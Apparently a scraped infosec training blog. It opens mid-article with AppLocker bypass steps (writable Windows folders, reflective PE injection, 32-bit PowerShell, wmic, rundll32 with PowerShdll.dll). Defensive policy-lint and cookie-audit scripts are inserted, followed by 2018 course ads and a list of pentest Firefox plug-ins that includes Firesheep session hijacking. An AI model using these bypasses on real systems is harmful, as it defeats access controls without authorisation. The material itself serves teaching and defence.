  • Once we know these locations are writable, copy the desired executable there: “mimikatz.exe”, “meterpreter.exe”, or whatever executable you want to run on the machine.
  • Run the desired executable now. Note that the reason for using an executable file is simply the convenience of having a particular piece of malware or a custom tool at hand. However, an attack does not require an executable file; it could be done using Invoke-Expression alone, through which we bypass any execution path restriction.

Now consider this case instead: you have searched for writable directories and could not find any. How would you proceed? If we could store the executable we want somewhere in memory and then jump to its address without needing any directory, the problem would be solved.

  • Use a PowerShell variable to store the executable file.
  • Use the PowerSploit framework’s Invoke-ReflectivePEInjection function. It loads this file into a memory location to which execution jumps in order to run the file.

Consider a more advanced Setup

What if the user was aware of the weaknesses of the default rules and instead restricted the use of cmd.exe and PowerShell.exe, to make sure that none of the previous steps, which rely on those applications, could be used?

  • Look for something the user forgot to block.
  • In this case, the user took care of all the 64-bit Windows tools and applied whatever rules he wished to them. Still, he overlooked the 32-bit Windows tools, which are the way to go instead. Simply use the “C:\Windows\SysWOW64\” location to open PowerShell, from where we can work with our executable file as mentioned before.
  • Even if we merely search for “PowerShell.exe”, we will find several versions of PowerShell, each with its own unique hash. There would still be plenty of PowerShell binaries with hashes other than the blocked one.
  • If all of the above instances of PowerShell are blocked along with cmd.exe, there is still a way out.
  • Use “C:\Windows\System32\wbem\wmic.exe”. This utility gets us very close to obtaining information about the system. It will of course not be as easy as it was with PowerShell; nevertheless, it still provides an alternative.

Consider a more advanced Setup

The user could be capable enough to block all of the previous methods, so that even WMIC cannot run. There is always a way out!

  • Note that DLL files are not blocked.
  • Search online for a DLL implementation of PowerShell.
  • Download it into any folder.
  • Run the file using the utility “C:\windows\system32\rundll32.exe”.
  • To execute it, type the DLL and its entry point function. In our case: “rundll32.exe PowerShdll.dll,main”.
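Every location this article uses to get past AppLocker (the writable folders under C:\Windows, the 32-bit PowerShell, wmic.exe, and rundll32.exe with an unrestricted Dll collection) is a policy gap a defender can test for before a standard user does. As an added, defender-side example (not from the original post or from Microsoft), the Python below reads a policy exported with Get-AppLockerPolicy -Effective -Xml and statically evaluates those locations against the Exe and Dll rule collections; the policy XML, the standard-user SID set and the path-variable expansion are constructed, simplified assumptions.

```python
"""Lint an exported AppLocker policy for the gaps described above.

Added, defender-side example for this article; not Microsoft tooling. Input is
the XML produced by: Get-AppLockerPolicy -Effective -Xml > policy.xml
Only FilePathRules are evaluated statically (hash and publisher rules need the
real files). The SID set and path-variable expansion are simplified assumptions.
"""
import fnmatch
import xml.etree.ElementTree as ET
# Well-known SIDs a standard (non-admin) interactive user belongs to (assumption).
STANDARD_USER_SIDS = {"S-1-1-0", "S-1-5-32-545", "S-1-5-11"}

# Simplified expansion of AppLocker path variables (assumed default install).
PATH_VARS = {
    "%WINDIR%": r"C:\Windows",
    "%SYSTEM32%": r"C:\Windows\System32",
    "%PROGRAMFILES%": r"C:\Program Files",
}

# Constructed policy: the default Exe rules, one exception for the Tasks folder,
# one deny rule on the 64-bit PowerShell only, and no Dll collection at all.
SAMPLE_POLICY = r"""<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="a1" Name="(Default Rule) All files located in the Program Files folder"
                  UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*"/></Conditions>
    </FilePathRule>
    <FilePathRule Id="a2" Name="(Default Rule) All files located in the Windows folder"
                  UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*"/></Conditions>
      <Exceptions><FilePathCondition Path="%WINDIR%\Tasks\*"/></Exceptions>
    </FilePathRule>
    <FilePathRule Id="a3" Name="(Default Rule) All files" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*"/></Conditions>
    </FilePathRule>
    <FilePathRule Id="d1" Name="Block 64-bit PowerShell" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%SYSTEM32%\WindowsPowerShell\v1.0\powershell.exe"/></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
"""

# Locations the article shows slipping past a default policy, per collection.
PROBE_PATHS = {
    "Exe": [
        r"C:\Windows\Tasks\anything.exe",
        r"C:\Windows\tracing\anything.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        r"C:\Windows\System32\wbem\wmic.exe",
        r"C:\Windows\System32\rundll32.exe",
    ],
    "Dll": [r"C:\Users\alice\Downloads\PowerShdll.dll"],
}

def _expand(pattern):
    for var, value in PATH_VARS.items():
        pattern = pattern.replace(var, value)
    return pattern.lower()

def _matches(path, conditions):
    """AppLocker's '*' spans directory separators, so fnmatch semantics fit."""
    return any(fnmatch.fnmatchcase(path.lower(), _expand(c.get("Path", "")))
               for c in conditions)

def evaluate(policy_xml, collection, path, user_sids=STANDARD_USER_SIDS):
    """Return 'Denied', 'Allowed', 'DeniedByDefault' or 'NotEnforced'."""
    root = ET.fromstring(policy_xml)
    coll = root.find(f"RuleCollection[@Type='{collection}']")
    if coll is None or coll.get("EnforcementMode") != "Enabled":
        return "NotEnforced"  # collection missing or audit-only: anything runs
    allowed = False
    for rule in coll.findall("FilePathRule"):
        if rule.get("UserOrGroupSid") not in user_sids:
            continue
        if not _matches(path, rule.findall("Conditions/FilePathCondition")):
            continue
        if _matches(path, rule.findall("Exceptions/FilePathCondition")):
            continue  # carved out of this rule
        if rule.get("Action") == "Deny":
            return "Denied"  # an explicit deny always wins
        allowed = True
    return "Allowed" if allowed else "DeniedByDefault"

def lint(policy_xml, probes=PROBE_PATHS):
    """Map (collection, path) to its decision; anything not denied needs review."""
    return {(coll, p): evaluate(policy_xml, coll, p)
            for coll, paths in probes.items() for p in paths}

if __name__ == "__main__":
    for (coll, path), decision in lint(SAMPLE_POLICY).items():
        flag = "" if decision.startswith("Denied") else "  <-- review"
        print(f"{coll:4} {decision:16} {path}{flag}")
```

With the sample policy the Tasks folder is carved out, but tracing, the 32-bit PowerShell, wmic.exe and rundll32.exe are still allowed and the Dll collection is not enforced, which is exactly the progression the article walks through.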



Finally, check out my other article on Transferring files from Linux to Windows (after exploit).

Web App Pentesting Night School

The primary focus of the class is transitioning from Network to Web App Pentesting

  • Differences and similarities
  • Learning the popular technologies and platforms in use today

Manually Identifying & Exploiting Vulnerabilities

  • SQL Injection
  • Cross Site Scripting
  • Remote/Local File Includes

Differences in how vulnerabilities are exploited on each platform

  • JSP/Oracle

Your First Web App Pentest


Lab Network Access

Strategic Security now has a penetration tester’s target practice lab environment. Targets in the lab network will change on the 1st of every month. Students have the option to purchase 1 or 1 months access to the lab environment.

Students will receive

  • 6 hours of CPEs
  • Several virtual machines
  • Courseware slides
  • Lab manual
  • Lab access


Each class will be recorded and made available to the students via email. So you can keep up with the class even if you have to miss time, or even a whole day.


Each student will be given access to an InfoSec Addicts Group for the class. This is where students can ask questions outside of the normal class hours and work with other students on lab exercises, homework, and challenges.

A Strategic Security class mentor will be assigned to the InfoSec Addicts Group to answer questions (allow 1 day for responses).

A Customer Relationship manager will be assigned to the class to manage questions, and support issues.



This class will be held live online on the 16th and 18th of January 2018, from 7pm EST to 9pm EST on each scheduled day.


Class Cost

The class cost is $200

Fill out this form to sign up for the class.




Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:


NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.

Pentester Candidate Program – March 2018

Pentester Candidate Program March 2018

On the 24th of February 2018, InfoSec Addicts will launch the Pentester Candidate Program. This program is designed to satisfy the basic requirements of a penetration tester. The program will cover the most common technical and soft skill requirements. Top candidates will later receive job interviews for a remote penetration testing job, through partnership with several penetration testing firms.

Top candidates may receive interview opportunities for a cleared penetration testing position. This is more so for those with a US Security Clearance and who live in either the DC, Maryland or Virginia areas.

This is the real chance more so for those who REALLY want to become pentesters. It is the perfect combination of hands-on training, mentorship, and a real job opportunity.


What is covered in the pentester program?

This program is hard, though rewarding. It will cover the following subject areas:

  • Command-Line Kung Fu
    • Linux Command-Line Fundamentals
    • Windows Command-Line Fundamentals
  • Network Penetration Testing
    • Scoping a penetration test
    • Performing a Penetration Test
    • Reporting penetration test findings
  • Web Application Penetration Testing
    • Scoping a web application penetration test
    • Performing a web application penetration test
    • Reporting web application penetration test findings
  • Python For InfoSec Professionals
    • Log parsing with Python
    • Pcap parsing with Python
    • Network testing with Python
    • Web App testing with Python


  • Preparing for a job as a Penetration Tester
    • Resume assistance
    • Assistance with building a portfolio based on this program
    • Mock interview
    • Interviews with up to 10 Penetration Testing firms for top candidates
    • Interviews with up to 5 DoD contractors for top cleared candidates


What is the actual class schedule?

February classes
    + 26th and 28th of February 2018 from 7pm to 9pm ($200 if purchased separately)

March classes
    + 9th and 11th of March 2018 from 7pm to 9pm ($200 if purchased separately)
    + 12th and 14th of March 2018 from 7pm to 9pm ($200 if purchased separately)
    + 19th and 21st of March 2018 from 7pm to 9pm ($200 if purchased separately)
    + 26th and 28th of March 2018 from 7pm to 9pm ($200 if purchased separately)

April classes
    + 9th and 11th of April 2018 from 7pm to 9pm ($200 if purchased separately)
    + 23rd and 25th of April 2018 from 7pm to 9pm ($200 if purchased separately)

May classes
    + 7th and 9th of May 2018 from 7pm to 9pm ($200 if purchased separately)
    + 21st and 23rd of May 2018 from 7pm to 9pm ($200 if purchased separately)
    + 28th and 30th of May 2018 from 7pm to 9pm ($200 if purchased separately)



How is the pentester program delivered?

Candidates will receive a set of tasks each Monday. They are to complete the tasks by Sunday at midnight EST. The tasks include:

  • Reading
  • Watching videos
  • Lab exercises to perform

On Thursdays from 7-8pm EST, a career development class is held (focused on resume development, portfolio development, mock interviews, and discussions with potential employers).

On Saturdays from 4-6pm EST, a live online training session/QA period will be held.


What are the prerequisites for the pentester program?

This program is more about desire; more so, it is about work ethic and the ability to work in a team environment. Although technical ability is important, it is not the most important attribute. That being said, candidates should have:

  • Familiarity with Windows, Linux, and VMware
  • Familiarity with basic programming concepts
  • Ability to commit 8-12 hours per week to the program

What do you receive?

  • Access to the training program
  • Weekly group mentoring sessions with Joe McCray
  • Monthly chances to speak with hiring managers and team leads from security consulting firms, in each month of the program
  • Log book of all of your labs. This is a technical walk-through document demonstrating your proficiency to companies you interview with
  • A letter of reference from Joe McCray
  • Top candidates are guaranteed interviews with consulting firms and DoD contracting companies.

Candidates will be able to take ANY and AS MANY classes as they want from InfoSec Addicts as part of this program. Most notably, as many as 20 classes are held per month.

This program will run for 3 months. It will run from the month of March up to the month of May 2018. Interviews for top candidates will occur later in the month of June 2018.

Please fill out the form below to sign up for this program.







Plug-ins are additional features for a browser that enhance the user experience. Firefox is one browser that supports a variety of plug-ins. These could include video scripts, animations, and other elements that browsers alone do not typically support.

Understanding how plug-ins work and interact with browsers is important, because most malicious attacks use plug-ins as a tool for cyber-trespassing and theft. Moreover, by understanding how plug-ins work we can secure our systems properly.

Plug-ins serve a multitude of purposes: safe browsing, information gathering, and entertainment, among other uses. Below are useful plug-ins one can use to gather information and carry out penetration testing.

FoxyProxy Standard

This add-on is a proxy management tool. It improves the browser’s proxy capabilities and provides analysis of URL patterns. It also switches the network connection among different proxy servers. An animated icon appears on the browser when a proxy is in use.

FoxyProxy Standard has a history tab that logs the servers used. The plug-in can be set to activate only when necessary, based on the nature of the URL. This makes the add-on more efficient than other proxy management plug-ins.

Firebug


This is a Firefox web development tool embedded into the browser. It enables editing of HTML, JavaScript or CSS directly in the live page, and the changes are seen immediately after saving.

This plug-in helps in pinpointing web application and web page vulnerabilities. It opens a window from which a penetration attack can be launched and a user’s data collected. It also enables inspection of the HTML elements in the page.

The CSS tab checks and edits the style of the page. It is a convenient way to edit the look of the page and view the changes immediately. Code can also be copied for further development outside the browser, and the tab enables scaling and margin setup to align text and images.

Furthermore, Firebug monitors network activity. If a page is loading slowly, you can check what causes the lag from this plug-in. Firebug has a powerful JavaScript debugger that identifies errors and measures performance of a script.

The DOM tab in the Firebug panel helps identify code tags and edit them. This plug-in also allows easy management of cookies: all accepted cookies are listed by value for review.


Live HTTP Headers

Live HTTP Headers is an effective penetration testing tool for troubleshooting, tuning and analyzing a website. The headers it exposes carry data such as language, caching, authorization, and character set. Normally these data are invisible; this plug-in, however, gives access to them.

To obtain header information, right-click on the page and select “View Page Info.” Next, click the Headers tab in the new pop-up window to view the page information. Press “Ctrl+Shift+A” to replay the header.


This plug-in can be considered a sniffer application, because it can watch the HTTP headers being exchanged. You can see what is happening, analyze it, and stop the capture. To change header or URL values, you only need to highlight, edit and replay a packet. Finally, it works on both Windows and Linux.

Hackbar

Hackbar is another penetration testing tool. It appears as an extension of the address bar and can perform POST data manipulation, encryption, and encoding. This helps in testing for XSS holes, web security issues, and SQL injection. Moreover, one can work with hash algorithms, Base64 decoding, and other data formats in Hackbar.

Firesheep

Firesheep gives you the capability to attack the HTTP sessions of other users on the same network. This plug-in shows all accounts found on the network. It uses the cookie unique to a logged-in account. This is a result of websites protecting the initial log-in but leaving the rest of the session unprotected.

These cookies are readily available to attackers on any open network. Firesheep captures users visiting an unsecured page; double-clicking a seized item logs you in as that user.
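Live HTTP Headers shows exactly the data that Firesheep relies on: a session cookie set at login and then sent back over plain HTTP. As an added example (not part of either plug-in or of the original post), the Python below parses a capture written in the Live HTTP Headers style and flags session cookies set without the Secure or HttpOnly attributes, as well as cookies sent in cleartext; the capture is constructed.

```python
"""Audit a Live HTTP Headers style capture for session cookies that an
eavesdropper on an open network could replay (the weakness Firesheep exploits).

Added example for this article, not part of either plug-in. The capture is
constructed: an HTTPS login response that sets cookies, then a plain-HTTP
request to the same site that sends one of them back in the clear.
"""
import re
from urllib.parse import urlsplit

SAMPLE_CAPTURE = """\
https://shop.example.test/login

POST /login HTTP/1.1
Host: shop.example.test
Content-Type: application/x-www-form-urlencoded

HTTP/1.1 302 Found
Set-Cookie: sessionid=c0ffee1234; Path=/; HttpOnly
Set-Cookie: csrftoken=7a7a7a; Path=/; Secure; HttpOnly
Location: /account
----------------------------------------------------------
http://shop.example.test/account

GET /account HTTP/1.1
Host: shop.example.test
Cookie: sessionid=c0ffee1234

HTTP/1.1 200 OK
Content-Type: text/html
----------------------------------------------------------
"""

# Live HTTP Headers separates exchanges with a line of dashes.
SEPARATOR = re.compile(r"^-{10,}$", re.MULTILINE)

def _headers(block):
    """Header lines after the start line, as (lowercase name, value) pairs."""
    pairs = []
    for line in block.splitlines()[1:]:
        name, _, value = line.partition(":")
        if value:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs

def parse_capture(text):
    """Split the log into dicts holding the URL, request headers and response headers."""
    exchanges = []
    for chunk in SEPARATOR.split(text):
        chunk = chunk.strip()
        if not chunk:
            continue
        url, _, rest = chunk.partition("\n\n")
        request, _, response = rest.partition("\n\n")
        exchanges.append({"url": url.strip(),
                          "request": _headers(request),
                          "response": _headers(response)})
    return exchanges

def _cookie_attrs(set_cookie):
    """Cookie name plus the set of lowercase attribute names (secure, httponly, ...)."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    flags = {p.split("=", 1)[0].strip().lower() for p in parts[1:]}
    return name, flags

def audit(exchanges):
    """Return (url, cookie name, issue) tuples, in capture order."""
    findings = []
    set_over_https = set()
    for ex in exchanges:
        scheme = urlsplit(ex["url"]).scheme.lower()
        for hname, value in ex["response"]:
            if hname != "set-cookie":
                continue
            cname, flags = _cookie_attrs(value)
            if scheme == "https":
                set_over_https.add(cname)
            if "secure" not in flags:
                findings.append((ex["url"], cname,
                                 "missing Secure: the browser will also send it over plain HTTP"))
            if "httponly" not in flags:
                findings.append((ex["url"], cname,
                                 "missing HttpOnly: readable by page scripts"))
        if scheme != "http":
            continue
        # Any cookie in a plain-HTTP request crosses the network unencrypted.
        for hname, value in ex["request"]:
            if hname != "cookie":
                continue
            for cname in (c.split("=", 1)[0].strip() for c in value.split(";")):
                where = "set over HTTPS at login but " if cname in set_over_https else ""
                findings.append((ex["url"], cname,
                                 where + "sent in cleartext: replayable by anyone on the network"))
    return findings

if __name__ == "__main__":
    for url, cookie, issue in audit(parse_capture(SAMPLE_CAPTURE)):
        print(f"{cookie:<12} {issue:<72} {url}")
```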

Tamper Data

Tamper Data is used to view and edit HTTP requests. This add-on records the ongoing requests for a particular website and displays them. The window shows details such as time, total duration, size and other information. Most noteworthy, the data can be copied to an external file for future reference.


CryptoFox

CryptoFox is an encryption/decryption plug-in. It appears as an extension of the address bar and has two fields: the first holds the text that needs encryption, and the second selects the desired encryption method.

CryptoFox supports over 40 techniques. Furthermore, it has a dictionary attack reference for MD5 passwords. To test this plug-in, here is an AES 128-bit encryption; we will then use the AES 128-bit decrypt method to check it.


Type “helloworld!” in the text field. Next, select AES 128-bit encryption and press the decode button. When asked for a password, enter “passwd”. This password will also be used for the decryption later.


After entering your password, click OK. This encrypts the text, which is then displayed in the first field. For cross-checking, select AES 128-bit Decrypt and use the same password.


Anonymox

Anonymox is a useful plug-in that enables anonymous browsing in Firefox. It creates a virtual identity, which protects you and gives access to sites commonly banned on your network. It also lets you change your IP address.

In addition, Anonymox’s settings can be customized per website. Bypassing GeoIP blocks is also possible through this add-on, since it changes your apparent origin location, giving you access to sites banned in your country.

Anonymox acts as a middle ground: the request is sent to the plug-in, and the plug-in itself talks to the web host. It lets you select proxy identities.


SQL Inject Me

This penetration testing plug-in identifies SQL injection vulnerabilities. It looks for database errors and loopholes, which helps carry out an attack by sending escape strings to the database. A completed test result shows the errors found and the options.


Certificate Patrol

Certificate Patrol helps pinpoint man-in-the-middle attacks by checking SSL certificates. It shows whether anything within the certificate was modified during an exchange. The add-on uses pop-ups to inform you of the SSL details and lets you choose whether to save them. If saved, the plug-in can cross-check for disparities.

To verify a certificate, the plug-in shows the old and new versions of the SSL certificate. Compare them carefully for discrepancies, and click the Reject button should you find anything suspicious.


FoxySpider

Web crawlers are useful. FoxySpider is one such Firefox add-on that organizes a website’s content. It displays and arranges videos, music, images, etc. according to file type. It is useful for gathering information about a website.

An icon on the left side of the address bar indicates that FoxySpider is installed. The tool has three modes: left-clicking organizes the files, right-clicking opens a search configuration window, and middle-clicking the icon pops up a window to set requirements such as keywords or specified URLs.


Firefox has a 35% user rating. With plug-ins such as these, security engineers can find it convenient to perform their tasks. Testing and gathering information are made easier with these add-ons. We encourage you to download these plug-ins and try them out yourself.


Elsewhere, click here to have a look at another cool post about Dridex malware.

Python For InfoSec Professionals

Python For InfoSec Professionals Night Class

This class aims at making students comfortable with using Python to perform simple IT Security tasks. Going beyond using other peoples’ tools in this field is the hardest step on the ladder to proficiency. This class will take you over that difficult step, enabling you to modify popular security tools or write your own. Most importantly, it is all taught in a simple manner that won’t put you to sleep like most programming courses.


Class Outline

Programming Concepts, Parsing Files, Logs, and PCAPs

  • Python Basics
  • Text File Parsing
  • CSV File Parsing
  • Log Parsing



  • PCAP Parsing
  • Port-Scanning
  • Bind/Reverse Shells
  • Scapy


  • SQL Injection
  • XSS


  • Memory Analysis
  • Identifying/Classifying/Analyzing Malware
  • Exploit Development with Python
  • Debugger automation

Please register to attend the class:



Students will receive

  • 30 hours of CPEs
  • Courseware slides
  • Lab Manual

Class Videos

Each class will be recorded and made available to the students via email. So you can keep up with the class even if you have to miss time or even a whole day.


Each student will receive access to an InfoSec Addicts Group for the class. Groups are where students can ask questions outside of the regular class hours and work with other students on lab exercises, homework, and challenges.

A class mentor is assigned to the InfoSec Addicts Group to answer questions (allow one day for responses).

Similarly, a Customer Relationship Manager is assigned to the class to manage questions and support issues.

Class Schedule

28th and 30th of May 2018 from 7pm to 9pm EST


Class Cost: $200

Fill out this form to sign up for the class.




Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:


NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.